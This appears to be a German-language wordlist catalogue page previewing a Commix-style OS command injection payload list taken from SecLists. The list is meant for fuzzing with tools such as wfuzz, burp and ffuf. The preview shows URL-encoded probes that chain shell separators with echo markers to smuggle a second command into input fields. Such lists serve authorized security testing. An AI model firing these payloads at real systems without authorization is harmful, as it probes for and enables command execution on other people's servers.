Command Injection (Commix)

echo%20AGIYMZ$((69%2B52))$(echo%20AGIYMZ)AGIYMZ %20echo%20TDJHRY$((30%2B41))$(echo%20TDJHRY)TDJHRY ;echo%20MPCSBG$((54%2B42))$(echo%20MPCSBG)MPCSBG &echo%20NWMZCF$((57%2B72))$(echo%20NWMZCF)NWMZCF |echo%20TJEGSE$((27%2B57))$(echo%20TJEGSE)TJEGSE ||echo%20ANSBHE$((26%2B89))$(echo%20ANSBHE)ANSBHE &&echo%20PVJXOS$((12%2B1))$(echo%20PVJXOS)PVJXOS %0aecho%20VVIEOJ$((30%2B78))$(echo%20VVIEOJ)VVIEOJ %3Becho%20SRPJET$((29%2B34))$(echo%20SRPJET)SRPJET %26echo%20NQPWBV$((16%2B77))$(echo%20NQPWBV)NQPWBV %26%26echo%20QOZRFB$((19%2B4))$(echo%20QOZRFB)QOZRFB %7Cecho%20IRODNG$((26%2B68))$(echo%20IRODNG)IRODNG %7C%7Cecho%20KRCSNE$((57%2B75))$(echo%20KRCSNE)KRCSNE echo%20IFNPXI$((40%2B99))$(echo%20IFNPXI)IFNPXI' %20echo%20HBFEEM$((46%2B2))$(echo%20HBFEEM)HBFEEM'

Umfangreicher OS-Command-Injection-Payload-Satz, erzeugt im Stil des Commix-Tools, der echo-Marker-Proben und viele Trennzeichen-/Kodierungs-Kombinationen verwendet. Zum Erkennen von Shell-Command-Injection-Sinks.

Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 918 KB und harmoniert gut mit Tools wie wfuzz, burp, ffuf. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.

Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt von ihrer Ursprungsquelle auf GitHub bereitgestellt.

Bezogen von danielmiessler/SecLists und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.

Vorschau